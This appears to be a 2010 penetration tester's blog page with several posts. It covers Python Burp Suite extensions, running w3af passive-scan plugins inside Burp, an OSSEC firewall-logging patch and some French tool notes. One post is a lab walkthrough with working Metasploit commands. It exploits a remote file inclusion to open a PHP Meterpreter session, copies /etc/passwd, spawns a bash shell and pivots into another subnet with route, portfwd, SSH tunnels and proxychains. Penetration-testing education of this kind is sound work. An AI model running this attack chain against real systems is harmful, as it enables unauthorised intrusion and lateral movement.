David Robert's -castlebbs- Blog

To content | To menu | To search

Thursday 9 September 2010

Running w3af plugins in Burp Suite

I am quite enthusiastic about the Burp Suite Python extension I wrote. This is a Python (Jython) binding written in Java implementing the Burp Suite extension API.

In the to-do list, I mentioned that more examples need to be written to show the benefit of having the Python support in Burp Suite to write extensions.

w3af is a web application attack and audit framework written in Python with a plugin based model. I found interesting to see what's involved in enabling Burp Suite to use w3af plugins.

As a demo/proof-of-concept I created a BurpExtender.py Python extension to load and execute w3af plugins within Burp Suite.

Not all the w3af plugins can be used in Burp mainly because limitations in the BurpExtender API. So for the moment, only plugins from the grep and evasion categories are supported.

While I may look at implementing other categories of plugins, having access to the grep plugins is nice, all the traffic going through Burp will be passively scanned by the plugins, and weaknesses will be reported in the Alert tab and in the console.

How to use it:
  1. Download the BurpSuite w3af plugin
  2. Follow the instructions for the installation of the Burp suite Python extension
  3. You need to select which plugins you want to use - This is in the first lines of the BurpExtender.py:
# Here you define the name of the plugins you want (category.plugin)
plugins = ['grep.domXss',  'grep.error500', 'grep.errorPages', 'grep.feeds',  
           'grep.fileUpload','grep.hashFind', 'grep.httpAuthDetect', 'grep.privateIP', 'grep.ssn',
           'grep.strangeHeaders', 'grep.strangeHTTPCode', 'grep.strangeReason', 'grep.svnUsers', 'grep.wsdlGreper']

You need to specify the path of the w3af python modules. I have tested this program with w3af version 1.0-rc3.

# Here you should define the location of your w3af installation
w3afPath="C:\\local\\Program Files\\w3af\\w3af"
# Example for Unix "/usr/local/w3af/w3af"
  1. Start Burp (example below with Windows):
C:\Burp>java -Xmx512m -classpath burpsuite_v1.3.03.jar;burppython.jar burp.Start Burp
init: Bootstrapping class not in Py.BOOTSTRAP_TYPES[class=class org.python.core.PyStringMap]
BurpExtender.py needs to be in a folder listed below:
['C:\\Burp\\Lib', '/C:/Burp/burppython.jar/Lib', '__classpath__', '__pyclasspath__/']
loading w3af plugins
Loading grep.domXss...                     Success
Loading grep.error500...                   Success
Loading grep.errorPages...                 Success
Loading grep.feeds...                      Success
Loading grep.fileUpload...                 Success
Loading grep.hashFind...                   Success
Loading grep.httpAuthDetect...             Success
Loading grep.privateIP...                  Success
Loading grep.ssn...                        Success
Loading grep.strangeHeaders...             Success
Loading grep.strangeHTTPCode...            Success
Loading grep.strangeReason...              Success
Loading grep.svnUsers...                   Success
Loading grep.wsdlGreper...                 Success

Failed plugins are ignored and won't be proceeded. You can uncomment
the line 'print str(e)' in the module to see the actual exception

While browsing, if issues are passively identified, they will appear in the console and in the alert tab:


  1. As stated previously, not all plugins categories are supported, I may look in the future and please email me if you have this need
  2. I probably need to put more work on the evasion plugins support since there are some issues in relation to the order in which the http headers are sent back to Burp
  3. Some grep plugins won't work out of the box because they require sqlite3 python module which is not available in the Java python implementation used by the python extension (Jython). However, it is possible to have this working using the sqlite jdbc support. Please drop me an email if you need help in implementing this so you will have all plugins working.

Please give me some feedback if you try it: david@ombrepixel.com

Monday 30 August 2010

Extending Burp Suite in Python

In a previous post, I wrote about creating a Burp Suite extension in Java using the IBurpExtender interface. When performing web application security testing, I often need to write small pieces of code to help me in automating some tasks and the code is generally specific the the application I am testing. Whereas I like Java, I think that dynamically typed languages are more efficient for creating small pieces of code quickly and efficiently. However, don't misquote me, dynamically typed languages like Python can also be (and are) used for very large development projects.

python Having used Python for about 8 years now, I found very interesting the idea of creating a Python binding for the Burp Suite. Since Burp is written in Java, I obviously used Jython, the java implementation of Python.

My goal was to allow anyone to write the Burp extensions directly in Python using the same BurpExtender interface. Therefore, if you wrote Burp extensions in Java, you already know how to write them in Python.

First example

This very simple extension replaces the string "java" to "python" in all http responses received by the Burp. This is useless; but it is just to show how easy it is to write an extension in Python. Only those few lines of code are needed:

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            message = message.tostring().replace("java","python")
        return message

Embedding an interactive python interpreter

Let's look at something a bit more interesting, using an interactive python console to work on some messages proceeded by Burp:

from burp import IBurpExtender
from java.net import URL
from code import InteractiveConsole

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            uUrl = URL("HTTPS" if serviceIsHttps else "HTTP", remoteHost, remotePort, url)
            if self.mCallBacks.isInScope(uUrl):
                message = message.tostring()
                from pprint import pprint
                c = InteractiveConsole(locals=loc)
                c.interact("Interactive python interpreter")
                for key in loc:
                    if key != '__builtins__':
                        exec "%s = loc[%r]" % (key, key)
        return message

    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks

What this code does basically is: launch a Python interpreter, make all the python namespace available (you can access and modify any field and method that is offered by the BurpExtender object). Is this not cool?

Only messages that are in the Burp Suite scope will be intercepted and made available interactively (Target/Scope tab in Burp). This is done by the line:

 if self.mCallBacks.isInScope(uUrl):

isInScope is a callback function, the mCallBack object is registered by the registerExtenderCallbacks python method.

Below is an example on what is available with the interactive shell. The shell is available on the console used to start Burp suite. When a message is in the scope, the shell is launched.

First, we are within the scope of the processProxyMessage method and have direct access to the different fields.

Interactive python interpreter
>>> pprint(dir())

>>> pprint(message)
'HTTP/1.1 200 OK\r\nDate: Mon, 30 Aug 2010 12:16:40 GMT\r\nServer: Apache/2.2.9 (Fedora)\r\nLast-Modified: Mon, 30 Aug 2010 11:12:52 GMT\r\nETag: "2aa3a-4d-48f088ba1f500"\r\nAccept-Ranges: bytes\r\nContent-Length: 77\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html>\n<head>\n<title>Test!</title>\n</head>\n<body>\nHello all!\n</body>\n</html>\n'

>>> print resourceType, responseContentType, statusCode
html text/html; charset=utf-8 200

It is also possible to interact with all the BurpExtender fields and methods:

>>> pprint(dir(self))

It is possible for example to call any Burp method provided by the callback object:

>>> for message in self.mCallBacks.getProxyHistory():
...     message.getRequest().tostring()
'GET /test.html HTTP/1.1\r\nHost:\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008121622 Fedora/3.0.5-1.fc9 Firefox/3.0.5\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nProxy-Connection: keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

Adding new options in Burp Suite menus

This only works with the professional version of Burp Suite (minimum 1.3.07)

Now I am going to show how to create a new menu item within Burp that will call new functions written in Python. This code below adds a "Compare parameters" item in the Burp Suite contextual menu. In the Proxy/History tab, you can select two messages, right click and select the new compare function. This code is just an example of what can be done, it compares GET and POST parameters between two requests and tells the differences. It can be useful though because the Burp Suite comparer is not great to compare requests.

from burp import IBurpExtender
from burp import IMenuItemHandler

from cgi import parse_qs

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks
        self.mCallBacks.registerMenuItem("Compare parameters", ArgsDiffMenuItem())

class ArgsDiffMenuItem(IMenuItemHandler):
    def menuItemClicked(self, menuItemCaption, messageInfo):
        print "--- Diff on arguments ---"
        if len(messageInfo) == 2:
            # We can do a diff
            print "Diff in GET parameters:"
            print "Diff in POST parameters:"
            print "You need to select two messages to do an argument diff"
        print "\n\n"

    def diff(self, params1, params2):
            for param in params1:
                if param not in params2:
                    print "Param %s=%s is not is the second request" % \
                          (param, params1[param])
                if params1[param] != params2[param]:
                    print "Request1 %s=%s Request2 %s=%s" % \
                            (param, params1[param], param, params2[param])
            for param in params2:
                if param not in params1:
                    print "Param %s=%s is not is the first request" % \
                          (param, params2[param])

class HttpRequest:
    def __init__(self, request):

    def getParameters(self):
        # get url parameters

        # get body parameters

How to use the python extension

You need the burppython.jar extension. I have created a jar file that contains the jython interpreter so you don't need to install anything else.


  1. You need to download the zipfile attached at the end of this article.
  2. You need to unzip the content in a dedicated folder.
  3. You need to copy the burpsuite jarfile in this folder (something like burpsuite_pro_v1.3.07.jar or burpsuite_v1.3.03.jar)
  4. The python extension (BurpExtender.py) needs to be placed in the Lib subfolder.
  5. You can launch the burp suite using suite.bat or suite.sh

Please send me an email to david@ombrepixel.com for any questions

To be done

A lot needs to be done,

  1. Add the capability of using several python and java extensions at the same time and link them together
  2. Add the capability of dynamically reload a python extension without having to stop-restart Burp
  3. Put the project on a tracking version system like GitHub
  4. Add more Demo that could leverage on the numerous Python libraries that already exist. UPDATE: please see the w3af extension
  5. ..

Tuesday 27 July 2010

Metasploit 4.2.1: PHP Meterpreter

metasploitOnly two months after version 3.4.0 of the framework, version 3.4.1 is released with an important number of new features.

Among the new features, I found this one really interesting:

  • PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system

The meterpreter is an advanced post exploitation system and is one of the best functions within metasploit. If you don't know what it is, I recommend you to have a look at the below:

Below is an example on how to launch a meterpreter session exploiting a Remote File Inclusion vulnerability in a php application. For the purpose of this test, I used the vulnerable version of Autonomous LAN party:

  • My "metasploit server" is on
  • The "vulnerable linux server" hosting the vulnerable web application is on, it is also connected to another subnet: not accessible by the Metasploit server
  • There is a windows "server" on the other subnet:
               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9925 updated yesterday (2010.07.25)

msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set SRVHOST
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp

We used the unix/webapp/php_include generic exploit with the php/meterpreter/bind_tcp payload, and then we run it:

msf exploit(php_include) > exploit
[*] Started bind handler

[*] Using URL:
[*] PHP include server started.
[*] Sending stage (35521 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-07-27 00:12:04 +0100

meterpreter >

We now have a meterpreter session, here are examples of commands that are supported by the PHP meterpreter:

meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts       localhost       castlebbs-vulnerables.localdomain       castlebbs-vulnerable  windows-server.localdomain  windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd

We can obtain a shell:

meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps

Meterpreter for windows system includes much more functions that don't make sense in the context of a php exploitation (eg. DLL injection, migration etc.). But the real good thing with the php meterpreter is that it has a fully functional support for port forwarding and enable also the creation of new routes. For instance, having exploited a RFI on our web application, we can pivot through the webserver and pen-test the windows server on the other subnet still from our Metasploit server.

First, let's have a look at the capability of adding a new route:

msf exploit(php_include) > sessions -l

Active sessions

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable ->

msf exploit(php_include) > route add 1
msf exploit(php_include) > route print

Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------      Session 1

It needs to be understood at this stage that this route is not added in the operating system routing table, but on the framework itself. It means that most of the auxiliary modules and the exploits will work directly and the network traffic will be routed through the meterpreter. Below is an example of using the scanner/smb/smb_version on the routed host:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run

[*] is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then let's have a look at the port forwarding capability. While the routing capability of metasploit is nice, as said previously, it is not a route defined at the operating system level on the metasploit server. It means that no software except metasploit can access the routed host directly. The command below will forward the local port 222 (on the metasploit server) to the remote port 22 of the vulnerable linux server.

meterpreter > portfwd add -L -l 222 -r -p 22
[*] Local TCP relay created: <->

Because we didn't upload a custom ssh server, we need to know the credentials to login or (or let's say scanner/ssh/ssh_login was successful). Launching this command:

ssh -p 222 localhost -l user

Will actually open a ssh session on the vulnerable linux server, this is the port forwarding. But there is better now, we can use the ssh port forwarding options to access directly the ports from the windows server. Example below, local port 445 is forwarded to port 445 on the windows server therefore smb tools can be launched locally.

ssh -L 445: -p 222 user@localhost

And to have the bread and the butter, we can you the ssh dynamic port option (-D please see man ssh) with proxychains on the metasploit host, so all traffic is redirected to the vulnerable linux server acting as a socks proxy enabling full access to the subnet(s) connected to

Proxychains configuration (by default)
socks4 9050

# ssh -D 9050  -p 222 user@localhost
# proxychains nmap -sV
# proxychains msfconsole # haha this even worked - but maybe not very useful since metasploit has the route option

Thursday 13 May 2010

OSSEC active response with linux: logging dropped packets

OSSEC is a great piece of software. When you understand well how it works, you can consider using active-responses so it acts really like a Host-based Intrusion Prevention System. 

There are a number of risks in enabling active responses, more details on the active-responses page:

  • Used by attackers as a denial of services attack (activating a response for a large number of legitimate IPs for instance using IP spoofing).
  • False positive: the configuration needs to be well fined-tuned for what level and/or which rules will prompt an active response.
But when the risks are understood, it can be just a great active defense tool, for example blocking in real-time brute-force attacks.

Any custom active responses can be written. OSSEC comes with a set of active responses scripts for Linux, one of them is firewall-drop.sh that add new rules to the linux firewall (iptables) to drop the packets.

This entry is to describe how to enable logging of dropped packets. I find useful to know if the response is efficient. For instance: what packets are being blocked after the response is triggered, how long will the attack continue, etc. This information is useful to tune the active-response timeout.

I like me you want to have logging enabled, since there is no options for that, I propose a patch for firewall-drop.sh:

As showed on this Splunk chart above, it is possible to ensure that the active responses timeouts are correct for a majority of attacks scenarios. At the bottom, in yellow are the active responses: the first bar is when OSSEC started to block the IP the second one is when OSSEC removed the firewall rules hence unblocking the IP. At the top in blue are the packets being dropped by the attacker after the active response was enabled.

This patch works with OSSEC version 2.4.1

Wednesday 6 May 2009

Lotus Notes/Domino Security

From: http://www.securityfocus.com/archive/101/492134

Here's a list of useful resources on Lotus Domino/Notes security:

http://seclists.org/pen-test/2002/Nov/0034.html (all thread)
http://seclists.org/pen-test/2007/Jul/0111.html (all thread)

Some testing tools:

http://www.appsecinc.com/products/appdetective/domino/ (commercial!)
http://www.rapid7.com/nexpose/features.jsp (commercial!)
Other commercial password crackers from Elcomsoft/Passware/etc.

And some exploits:


Wednesday 9 May 2007

Metasploit self-training

If part of you job is about security or if this is a hobby, you probably heard about the metasploit project. This tool will help you during penetration testing, you can try known exploit and create your own tools.

There was an interesting threat on the pen-test mailing list in regard to resources freely available on the internet to learn how to use metaslpoit. Here is a sum-up of the links provided on the list:

  • Official documentation:
  • User guide:
  • The metasploit book :
  • Article on Security Focus (maybe a little bit outdated) :
  • Demos on milw0rm :
  • Flash tutorial:
  • A few videos :

Wednesday 21 March 2007

scapy vs hping3 : spectrographe de distribution ISN

scapy et hping3 sont des outils de manipulation de paquets réseau. Ce sont des couteaux suisses de la fabrication, de l'envoi et de la réception de paquets. M'intéressant particulièrement à Python, je me suis naturellement intéressé à scapy. Il existe d'autres outils et bibliothèques pour python (par exemple impaquet, pcapy). Le les présenterai dans d'autres billets. Hping3 est un autre outil très puissant intégrant un interpréteur tcl, je me suis donc intéressé à comparer ces deux produits. Ce billet présente mes débuts de comparaison et n'est pas fait pour être exhaustif sur le sujet. Il est juste là pour recueillir mes premières impressions

Pour commencer ma comparaison j'ai décidé d'écrire en Python/Scapy le programme isn-spectrogram écrit en tcl/hping3. La création de paquet, envoi et réception a été réécrite avec scapy, la fenêtre graphique réécrite avec Tkinter (isn-spectrogram utilisant Tk, le portage a été facile :-)). Ce programme analyse les numéros de séquence renvoyés par le destinataire lors de l'initialisation d'une connexion TCP. Ce programme dessine un spectrogramme qui représente la distribution des écarts de numéros de séquence renvoyés entre les différents paquets. Ces écarts correspondent à des incréments aléatoires et plus le spectre sera large, plus il sera difficile de déterminer les numéros de séquences.

Spectrogramme linux 2.4.27 :


Spectrogramme d'un routeur Zyxel (!) :

Continue reading...

Saturday 24 February 2007

Fiabilité de Software inspector

Dans le billet précédent, j'ai parlé de Secunia Software Inspector. Après une première impression assez positive, j'ai constaté que bon... c'est mieux que rien, mais c'est pas super super fiable comme logiciel :

  • Pour obtenir le niveau de mise à jour de Windows, l'application se base sur Windows Update. Or si pour une raison quelconque les serveurs ne sont pas joignables, Software Inspector vous informera que votre Windows et à jour et que toutes les mises à jour de sécurité sont installées. Même si ce n'est pas le cas. J'ai contacté Secunia pour les prévenir de ce bug plus que génant.
  • J'ai fait un test avec un PC sous XP sur lequel est installé firefox Software Inspector me dit que c'est Ok que j'ai la version la plus à jour. Or la version est sortie qui corrige des problèmes de sécurité.

Pour le deuxième point, il faut modérer, la version vient de sortir (il y a quelques heures), il faut voir en combien de temps secunia prendra en compte cette version.

Pour le deuxième point c'est beaucoup plus génant. D'autant plus qu'il y a de nombreuses raisons pour que votre système ne puisse pas se connecter à Windows Update : Problèmes réseau, règles de pare-feu. Mais également et surtout les anti-virus ou pare-feu personnels (Sophos, Mac Afee Virus Scan etc.) bloquent par défaut le processus svchost.exe. C'est ce processus générique qui va pourtant se connecter aux serveurs de Windows Update.

Qu'il y a t'il de pire que d'avoir un système vulnérable ? : Avoir un système vulnérable et croire qu'il ne l'est pas.

Edit du 27/02/07

  • Pour le premier point, un Bugtraq ID a été créé : Secunia Software Inspector Security Update Verification Weakness http://www.securityfocus.com/bid/22736
  • Pour le deuxième point, j'ai eu une réponse de secunia qui m'informe avoir ajouté la version dans la base de signatures de Sofware Inspector

Wednesday 21 February 2007

Secunia Software Inspector

Outil en ligne qui teste les versions des logiciels installés et informe sur les vulnérabilités connues.

Pour les utilisateurs de Windows qui ne savent pas trop où ils en sont des vulnérabilités de leurs applications installée (ansi que de le niveau de mise à jour de Windows).

Ca reconnait un nombre limité de logiciels, mais c'est pas mal, gratuit et il n'y a rien à installer sur le poste à analyser. Le rapport fourni même les indications à suivre pour mettre à jour le logiciel vulnérable ainsi qu'un lien vers la description de la vulnérabilité sur le site secunia.


Est-ce sécurisé d'utiliser ce service en ligne ?

Vous exécutez une applet signée par secunia qui peut potentiellement faire beaucoup de choses sur votre système. La question à se poser est Avez-vous confiance en secunia ?. Mon opinion est que si vous vous posez la question, vous n'avez pas besoin d'utiliser ce service :-) : vous êtes sensibilisé aux problèmes de la sécurité et donc vous savez mettre à niveau vos logiciels.

Tuesday 13 February 2007

CP8 smartcard reader: explore the carte bleue (credit card)

Photo lecteur

J'ai acheté un lecteur de cartes à puce d'occasion pour 1 euro dans un magasin Toulousain. Ce lecteur assez vieux fonctionne parfaitement sous Linux, j'ai décidé d'écrire cette page pour décrire le travail que j'ai fait autour de ce lecteur.

Accéder à des photos du lecteur

L'auteur ne pourra en aucun cas être tenu responsable des préjudices ou dommages de quelque nature que ce soit pouvant résulter de l'utilisation de ses explications ou programmes.

Continue reading...

- page 1 of 2